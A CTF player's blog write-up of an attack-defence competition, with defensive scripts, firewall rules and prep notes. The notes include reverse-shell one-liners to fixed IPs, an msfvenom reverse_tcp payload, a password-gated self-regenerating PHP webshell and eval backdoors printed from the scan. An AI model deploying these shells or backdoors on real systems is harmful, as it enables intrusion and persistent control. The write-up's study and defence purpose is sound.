iloveflag-blog

AWD Summary

2020/09/08

I played an offline city-level competition in AWD (attack-defence) format. Each team defended two target machines: web1 ran Typecho and web2 ran YznCMS V1.0. Our plan was two defenders and one attacker. When the competition started the environment had problems and I, the attacker, could not get in; by the time I connected, the hardening window had already passed. I downloaded the source straight away and a D盾 (D-Shield) scan turned up several webshells:

c:\users\iloveflag\desktop\172.20.131.102\application\pay\controller\api.php

```php
public function alipay_callback() {
    $param = $this->request->request('param');
    eval($param);
```

c:\users\iloveflag\desktop\172.20.131.102\application\pay\library\service.php

```php
    try {
        $pay = Pay::$type(self::getConfig($type));
        $get = request()->get('', null, 'trim');
        // drop empty values
        $get = array_filter($get, create_function('$v', 'return !empty($v);'));
        $data = $type == 'wechat' ? file_get_contents("php://input") : $get;
        $data = $pay->verify($data);
        if ($data) {
            return $pay;
        }
    } catch (Exception $e) {
        return false;
    }
    return false;
}
```
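As an added example that is not part of the original post, here is a small Python scanner for the shapes the D盾 findings above show: a code-execution sink (eval, create_function, and the other dangerous functions the audit list later mentions) in the same file as request input, and the self-rewriting "undying" file. It lets a defender sweep a downloaded source tree during the hardening window. The regexes are my own, not D盾's signatures, and the PHP files it scans are constructed in a temporary directory.

```python
import os
import re
import tempfile

# Each rule is a regex over one PHP source file (my own patterns, not D盾's signatures).
SINK_RULES = {
    "eval": re.compile(r"\beval\s*\("),
    "assert": re.compile(r"\bassert\s*\("),
    "create_function": re.compile(r"\bcreate_function\s*\("),
    "preg_replace_e": re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*/[a-zA-Z]*e[a-zA-Z]*['\"]"),
    "command_exec": re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\("),
}
# request data reaching the file: PHP superglobals or ThinkPHP's request object
REQUEST_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b|->request\(|request\(\)->")
# the self-rewriting "undying" shell: all three markers must be present in one file
UNDYING_MARKERS = ("ignore_user_abort", "set_time_limit(0)", "file_put_contents")


def scan_source(src):
    """Return the names of the rules that fire on one PHP source string."""
    hits = [name for name, rx in SINK_RULES.items() if rx.search(src)]
    # a sink in the same file as request input is the classic webshell shape
    if hits and REQUEST_INPUT.search(src):
        hits.append("sink_with_request_input")
    if all(marker in src for marker in UNDYING_MARKERS):
        hits.append("undying_shell")
    return hits


def scan_tree(root):
    """Map relative path -> hits for every .php file under root, dotfiles included."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_source(fh.read())
            if hits:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return findings


# Constructed sample tree: the two findings from the scan above, a hidden
# self-rewriting shell, and one clean file that must not be flagged.
SAMPLES = {
    "application/pay/controller/api.php":
        "<?php class Api { public function alipay_callback() {\n"
        "  $param = $this->request->request('param');\n  eval($param);\n} }",
    "application/pay/library/service.php":
        "<?php $get = request()->get('', null, 'trim');\n"
        "$get = array_filter($get, create_function('$v', 'return !empty($v);'));",
    "public/.blue3.php":
        "<?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__);\n"
        "while (1) { file_put_contents('./.blue3.php', '<?php @eval($_POST[a]);'); usleep(5000); }",
    "public/index.php": "<?php echo 'hello'; require 'app.php';",
}


def demo():
    """Write the constructed samples into a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for rel, src in SAMPLES.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(src)
        return scan_tree(root)


if __name__ == "__main__":
    for path, hits in sorted(demo().items()):
        print(path, "->", ", ".join(hits))
```

A hit on `sink_with_request_input` or `undying_shell` is what to read first; a bare `command_exec` hit in a CMS is often legitimate and needs a look at the surrounding code before anything is deleted.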

I deleted them. Later I noticed the other teams putting up a WAF, so we deployed the awd-watchbird-master WAF as well. On web2 the home page stopped loading as soon as the WAF went on. On web1 we had not found any vulnerability yet, so the WAF went on as a stopgap and the pages stayed up for the time being. As soon as I saw web2 go down I deleted the web directory and started restoring; the site became reachable again, but the home page was still broken, and from then on the checker kept failing and the referees kept deducting points. After the match other teams told us the restore was pointless: web2 had a small bug that required fixing a log file by hand? I was dumbfounded. Since web2 was already failing checks anyway, I put the WAF on it to keep other teams from finding the bug and taking the flag, and turned to web1.

In the afternoon we kept losing flag points, and I suspected an undying webshell (不死马) had been planted on web1. Because web1 already had the WAF, its log showed one team coming in through index.php/api/alipay_callback. At first I assumed alipay was web2's vulnerability and the opponent was just scanning everybody, but when I saw the undying shell I realised something was wrong. Still, a global search for alipay found no such API, so all I could do was delete the whole web directory and restore. Then I found the opponent had dropped an undying shell named .blue3.php under the public directory. I restored again and created a .blue3.php of my own with permissions 111. After that a skyexp.php turned up; the opponent kept wrestling with me, and the logs showed their web persistence calling back to their port 8080. `w` on the Linux server showed them logged in the whole time, but the infuriating part was that I was not root, only the ctf user, so I could not restart nginx, and kill could not throw out the persistence running as www-data. That made for a miserable experience. Taking flags would have been one thing, but they deleted every php file under the index directory, leaving only a few directories, so a teammate had to keep restoring. Later it occurred to me that I could plant a shell on my own server first: entering through the web side gives www-data privileges, and from there `pkill -kill -t pts/0` kicks the user. After that it was a contest of hand speed. The opponent also switched from the .1 IP to the .2 IP, perhaps two of their teammates working together, right up to the end of the match.

Afterwards I saw that every other team's web1 had been hit by the same team; the web1 servers went down outright, and web2 had the same page error and check-down deductions everywhere. One team had prepared several reliable WAFs, lost no points, and placed near the top. This was my first AWD. Preparation was simply inadequate: I came to attack and spent the whole event doing ops and defence, and my teammate could not connect to web1 all morning either. The firewall and mysql changes we had prepared never got used.
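Added example, not from the post: a triage pass over access-log lines for the three things the write-up found by reading logs by hand: hits on the index.php/api/alipay_callback route, requests for dotfile .php scripts such as .blue3.php, and a single client POSTing in a burst. The log lines, the two client addresses (mirroring the .1 and .2 hosts in the story) and the five-POST threshold are constructed assumptions.

```python
import re
from collections import Counter, defaultdict

# nginx/apache combined log format; the referrer and user-agent fields are ignored
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# the route the write-up found in web1's log as the attacker's entry point
BACKDOOR_ROUTES = ("/index.php/api/alipay_callback",)
# hidden dotfile scripts such as .blue3.php, .shell.php or .index.php
HIDDEN_PHP_RE = re.compile(r"/\.[^/]*\.php(\?|$)")
POST_BURST_THRESHOLD = 5   # POSTs from one client before we call it a burst (assumption)


def parse_line(line):
    """Split one combined-format line into fields; None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def triage(lines, post_threshold=POST_BURST_THRESHOLD):
    """Return {reason: [...]} for the suspicious entries in an iterable of log lines."""
    alerts = defaultdict(list)
    posts_per_ip = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            alerts["unparsed"].append(line)
            continue
        path = rec["path"].split("?", 1)[0]
        if any(path.startswith(route) for route in BACKDOOR_ROUTES):
            alerts["backdoor_route"].append((rec["ip"], rec["path"]))
        if HIDDEN_PHP_RE.search(rec["path"]):
            alerts["hidden_php"].append((rec["ip"], rec["path"]))
        if rec["method"] == "POST":
            posts_per_ip[rec["ip"]] += 1
    for ip, n in posts_per_ip.items():
        if n >= post_threshold:
            alerts["post_burst"].append((ip, n))
    return dict(alerts)


# Constructed sample log: one entry via the backdoored route from the .1 host,
# five POSTs to a hidden shell from the .2 host, normal traffic, and a junk line.
SAMPLE_LOG = [
    '172.20.131.1 - - [08/Sep/2020:10:02:11 +0800] "GET /index.php HTTP/1.1" 200 5123',
    '172.20.131.1 - - [08/Sep/2020:10:02:13 +0800] "POST /index.php/api/alipay_callback HTTP/1.1" 200 0',
    '172.20.131.3 - - [08/Sep/2020:10:03:40 +0800] "GET /usr/themes/default/style.css HTTP/1.1" 304 0',
] + [
    '172.20.131.2 - - [08/Sep/2020:10:05:%02d +0800] "POST /public/.blue3.php HTTP/1.1" 200 14' % s
    for s in range(1, 6)
] + ["not a log line"]


if __name__ == "__main__":
    for reason, entries in triage(SAMPLE_LOG).items():
        print(reason, entries)
```

Run it against the real log with `triage(open('/var/log/nginx/access.log'))`; the `unparsed` bucket is worth a glance too, since a custom log format simply shows up there rather than silently matching nothing.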

Pre-competition preparation notes (honestly, they were of little use):

Add a WAF:

```shell
find /var/www/html -name "*.php" | xargs sed -i "s#<?php#<?php\ninclude_once('/var/www/html/log.php');\n#g"
```

(the `g` flag rewrites every `<?php` tag in each file, not just the one at the top, so check the result against a copy before trusting it)

Firewall configuration

linux:

```shell
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.102 lport=8080 -f elf -o shell

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
```

Firewall:

```shell
# show the currently open services
[root@192 ~]# firewall-cmd --list-services
dhcpv6-client http https mysql ssh

firewall-cmd --add-service=mysql      # open the mysql port
firewall-cmd --remove-service=http    # block the http port
firewall-cmd --list-services          # list the open services
firewall-cmd --add-port=3306/tcp      # allow tcp access to 3306
firewall-cmd --remove-port=3306/tcp   # block tcp access to 3306
firewall-cmd --add-port=233/udp       # allow udp access to 233
firewall-cmd --list-ports             # list the open ports
```

(without `--permanent` these are runtime-only changes and are lost on the next firewalld reload)

Block remote mysql logins:
Firewall side: `firewall-cmd --remove-service=mysql`
Database side:
Allow remote login:

```sql
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;
FLUSH PRIVILEGES;
```

Remove it:

```shell
mysql_secure_installation
```

Configuration files of common CMSes:

- PHPCMS V9: \phpcms\base.php
- PHPWIND8.7: \data\sql_config.php
- DEDECMS5.7: \data\common.inc.php
- DiscuzX2: \config\config_global.php
- Wordpress: \wp-config.php
- Metinfo: \include\head.php

Remove an undying webshell:

```shell
ps aux | grep www-data | awk '{print $2}' | xargs kill -9
```

(this kills every www-data process, php-fpm and web-server workers included, so expect the site to need a restart afterwards)

AWD overview and division of labour (everything here must be done)
Change the server ssh and other passwords uniformly to nbccserver95, the webshell password to nbccshell95, and the mysql password to nbccmysql95
Three people per team: two attackers, one defender
Preparation (30 minutes)
Pack up the source:
tar -cvf html.tar ./
Watch-and-restore script -> restore every 5 minutes

```python
# -*- encoding: utf-8 -*-
'''
@File : awd.py
@Time : 2020/08/09 20:44:54
@Author : iloveflag
@Version : 1.0
@Contact : iloveflag@outlook.com
@Desc : The Win32 port can only create tar archives,
but cannot pipe its output to other programs such as gzip or compress,
and will not create tar.gz archives; you will have to use or simulate a batch pipe.
BsdTar does have the ability to directly create and manipulate .tar, .tar.gz, tar.bz2, .zip,
.gz and .bz2 archives, understands the most-used options of GNU Tar, and is also much faster;
for most purposes it is to be preferred to GNU Tar.
'''

import paramiko
import os
import time


def web_server_command(command, transport):  # run a command on the server
    ssh = paramiko.SSHClient()
    ssh._transport = transport  # reuse the transport that is already authenticated
    stdin, stdout, stderr = ssh.exec_command(command)
    stdout.channel.recv_exit_status()  # block until the remote command has finished
    # print(stdout.read())


def web_server_file_action(ip, port, user, passwd, action):  # file operations on the server
    try:
        transport = paramiko.Transport((ip, int(port)))  # Transport takes one (host, port) tuple
        transport.connect(username=user, password=passwd)
        sftp = paramiko.SFTPClient.from_transport(transport)
        remote_path = '/var/www/html/'
        remote_file = 'html.tar'
        local_path = 'C:/Users/' + os.getlogin() + '/Desktop/awd/' + ip + '/'
        if not os.path.exists(local_path):
            os.makedirs(local_path)
        if action == 'get':
            # pack the web root on the server, pull the archive, then delete the remote copy
            web_server_command('cd ' + remote_path + ' && tar -cvf ' + remote_file + ' ./', transport)
            sftp.get(remote_path + remote_file, local_path + remote_file)
            web_server_command('rm -rf ' + remote_path + remote_file, transport)
            print('server source saved to ' + local_path)
            print('extracting:')
            # Windows cmd: '&' chains the commands, 'del' removes the archive afterwards
            os.system('cd ' + local_path + ' & tar -xvf ' + remote_file + ' & del ' + remote_file)
            print('extraction finished')
        else:
            # wipe the server web root and push the local copy back;
            # a plain '*' glob skips dotfiles such as .blue3.php, so clear those too
            web_server_command('rm -rf ' + remote_path + '* ' + remote_path + '.[!.]*', transport)
            print('cleared the server web directory')
            os.system('cd ' + local_path + ' & tar -cvf ' + remote_file + ' ./*')
            sftp.put(local_path + remote_file, remote_path + remote_file)
            print('upload complete')
            web_server_command('cd ' + remote_path + ' && tar -xvf ' + remote_file + ' && rm -rf ' + remote_file, transport)
            print('restore complete')
        print('-----------------------------')
        sftp.close()
        transport.close()
    except Exception as e:
        print('download or upload error:', e)


def web_server_mysql_action():
    # web_server_mysql_action: not implemented yet
    pass


def web_server_status():
    # web_server_status: not implemented yet
    pass


if __name__ == '__main__':
    web1_server_ip = '172.20.131.101'
    web1_server_port = '22'
    web1_server_user = 'ctf'
    web1_server_passwd = 'nbccserver95'
    while True:
        # countdown between restores (5 s here; the notes above say every 5 minutes)
        for i in range(5, 0, -1):
            time.sleep(1)
            print('countdown ' + str(i) + ' s')
        web_server_file_action(web1_server_ip, web1_server_port, web1_server_user, web1_server_passwd, 'put')
```

vscode -> ssh plugin, edit online in real time
5 Linux servers, non-root users
httpd -> apache user
nginx -> www-data user
Attack:
Environment
At least one Linux host in bridged mode
masscan -p80,22 192.168.0.1/24 --rate=1000
faster than nmap
or arp-scan
Code audit
Tools: D盾, Seay source audit, RIPS
Usually the simplest eval backdoor, deserialization vulnerabilities, command execution
Search for dangerous functions: eval, assert, system, etc.
Some common CMS vulnerabilities
Metinfo 6.0.0 analysis of its many vulnerabilities
Once found, tell the defender which files to change
Default-password batch scanning
After getting a password, change ours first, then use the default password to batch-login the other hosts
Backdoor hiding
… directory
.shell.php
invisible to ls
One-liner reverse shells
bash
```shell
bash -i >& /dev/tcp/192.168.0.103/8080 0>&1
```

python

```shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.31.41",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

php

```shell
php -r '$sock=fsockopen("192.168.31.41",8080);exec("/bin/sh -i <&3 >&3 2>&3");'
```
Reverse-shell port convention: for 192.168.10.234 the port is 8234, so the ports are managed uniformly
Undying webshell
A php file regenerated in a loop; suggested location is the … directory, with the file name .index.php
```php
<?php
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = './.index.php';
$code = '<?php if(md5($_POST["pass"])=="3a50065e1709acc47ba0c9238294364f")
{@eval($_POST[a]);} ?>';
// pass=Sn3rtf4ck   shell usage: fuckyou.php?pass=Sn3rtf4ck&a=command
while (1){
    file_put_contents($file,$code);
    usleep(5000);
}
?>
```

Defence:
Weak passwords
Mostly mysql; the details can be seen in php files such as config.php
Change the mysql password: xxx
Block remote mysql login: xxx
Firewall configuration
ubuntu -> ufw
centos7 -> firewalld
centos6 -> iptables
There are one-click AWD firewall scripts online
e.g. only allow the team's IP to log in to the host, and only open ports 80 and 22
```shell
#!/bin/bash
#Allow yourself to ping other hosts, prohibit others from pinging you
iptables -A INPUT -p icmp --icmp-type 8 -s 0/0 -j DROP
iptables -A OUTPUT -p icmp --icmp-type 8 -s 0/0 -j ACCEPT
#Close all INPUT FORWARD OUTPUT, just open some ports
iptables -P INPUT DROP
iptables -P FORWARD DROP
iptables -P OUTPUT DROP
#Open ssh
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 22 -j ACCEPT
#Open port 80
iptables -A INPUT -p tcp --dport 80 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 80 -j ACCEPT
#Open multiport
#iptables -A INPUT -p tcp -m multiport --dport 22,80,8080,8081 -j ACCEPT
#Control IP connection
#The maximum number of connections for a single IP is 30
iptables -I INPUT -p tcp --dport 80 -m connlimit --connlimit-above 30 -j REJECT
#A single IP allows up to 15 new connections in 60 seconds
iptables -A INPUT -p tcp --dport 80 -m recent --name BAD_HTTP_ACCESS --update --seconds 60 --hitcount 15 -j REJECT
iptables -A INPUT -p tcp --dport 80 -m recent --name BAD_HTTP_ACCESS --set -j ACCEPT
#Prevent port reuse
iptables -A OUTPUT -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 443 -m state --state ESTABLISHED -j ACCEPT
#Filter abnormal packets
iptables -A INPUT -i eth1 -p tcp --tcp-flags SYN,RST,ACK,FIN SYN -j DROP
iptables -A INPUT -p tcp --tcp-flags ALL FIN,URG,PSH -j DROP
iptables -A INPUT -p tcp --tcp-flags ALL NONE -j DROP
iptables -A INPUT -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j DROP
iptables -A INPUT -p tcp --tcp-flags ALL SYN,FIN,RST -j DROP
iptables -A INPUT -p tcp --tcp-flags ALL SYN,FIN,PSH -j DROP
iptables -A INPUT -p tcp --tcp-flags ALL SYN,FIN,RST,PSH -j DROP
iptables -A INPUT -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
iptables -A INPUT -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP
#Prevent DoS attacks
iptables -A INPUT -p tcp --dport 80 -m limit --limit 20/minute --limit-burst 100 -j ACCEPT
#Discard unfamiliar TCP response packets to prevent rebound attacks
iptables -A INPUT -m state --state NEW -p tcp ! --syn -j DROP
iptables -A FORWARD -m state --state NEW -p tcp --syn -j DROP
```

WAF configuration
A generic defence may be detected; once the 30-minute hardening period is over, put the WAF on as soon as the match starts by adding require_once('waf.php'); to the first line of every php file, but take care not to break normal access
For a familiar CMS, change the configuration file instead, e.g. the include folder, which every file includes by default
Search GitHub for WAFs
View logged-in users
w
Kick out a user: xxx
Removing undying webshells
Use a bash script to delete in a loop, racing the shell's rewrite
One-liner shells
Check port status with netstat
ps -a
kill the process, etc.
Scripts
Keep the files locally and restore the server every 5 minutes
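Added example (not the post's own code) for the two cleanup items above, "removing undying webshells" and the earlier `ps aux | grep www-data | xargs kill -9` one-liner: it replaces a regenerated shell file with an empty placeholder the web user cannot write (the mode-111 trick from the write-up, with a retry so it can win the race against a loop that rewrites every 5 ms), and it picks the interpreter processes to kill out of `ps aux` output instead of killing every www-data process. The ps output and file paths are constructed; the function names are my own.

```python
import os
import re
import stat
import tempfile

# command names that a dropped shell or loop runs under; php-fpm/nginx/apache are not in here
INTERPRETERS = {"php", "php7", "php8", "sh", "bash", "python", "python3", "perl"}
# `ps aux` columns: USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
PS_RE = re.compile(r"^(?P<user>\S+)\s+(?P<pid>\d+)\s+(?:\S+\s+){8}(?P<cmd>.+)$")


def neutralize_file(path, mode=0o111, attempts=50):
    """Delete the shell file and leave an empty, non-writable file in its place.

    The loop only calls file_put_contents() on the path, so a file the web user
    cannot open for writing makes every rewrite fail with EACCES (mode 111 denies
    write even to the owner unless it is root). A loop that unlinks before it
    writes defeats this, and then the process itself has to be killed.
    """
    for _ in range(attempts):  # the loop rewrites every 5 ms, so retry if it wins a round
        if os.path.lexists(path):
            os.remove(path)
        try:
            fd = os.open(path, os.O_CREAT | os.O_WRONLY | os.O_EXCL, 0o000)
        except FileExistsError:
            continue
        os.close(fd)
        os.chmod(path, mode)
        return stat.S_IMODE(os.stat(path).st_mode)
    raise RuntimeError("could not win the race for " + path)


def select_suspect_pids(ps_output, web_user="www-data"):
    """From `ps aux` text, return PIDs of interpreter processes running as web_user.

    php-fpm and the web-server workers also run as www-data, so killing every
    www-data process takes the site down with the shell; this keeps only command
    lines whose program is a script interpreter.
    """
    pids = []
    for line in ps_output.splitlines():
        m = PS_RE.match(line)
        if not m or m.group("user") != web_user:
            continue
        program = os.path.basename(m.group("cmd").split()[0])
        if program in INTERPRETERS:
            pids.append(int(m.group("pid")))
    return pids


# Constructed `ps aux` output: two legitimate www-data workers, a php loop
# regenerating a hidden shell, an interactive sh spawned by it, and the ctf user.
SAMPLE_PS = """\
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1 225868  9400 ?        Ss   09:00   0:01 /sbin/init
www-data   842  0.0  0.5 312000 21000 ?        S    09:01   0:00 php-fpm: pool www
www-data   843  0.0  0.3  89000 11000 ?        S    09:01   0:00 nginx: worker process
www-data  1337 99.0  0.2  40000  8000 ?        R    10:12   3:11 php /var/www/html/public/.blue3.php
www-data  1400  0.0  0.1  12000  3000 ?        S    10:13   0:00 /bin/sh -i
ctf       1500  0.0  0.1  10000  2500 pts/0    S    10:20   0:00 -bash
"""


def demo():
    """Neutralize a constructed shell file in a temp dir and pick PIDs from SAMPLE_PS."""
    with tempfile.TemporaryDirectory() as d:
        shell = os.path.join(d, ".blue3.php")
        with open(shell, "w") as fh:
            fh.write("<?php @eval($_POST[a]); ?>")  # constructed stand-in for the dropped file
        mode = neutralize_file(shell)
        size = os.path.getsize(shell)
    return mode, size, select_suspect_pids(SAMPLE_PS)


if __name__ == "__main__":
    mode, size, pids = demo()
    print("placeholder mode %o, size %d, suspect pids %s" % (mode, size, pids))
```

On the live box the PIDs returned by `select_suspect_pids` are what `kill -9` should get, and `neutralize_file` is run on each path the scan reported; doing the kill first and the file second means the placeholder does not have to win any race at all.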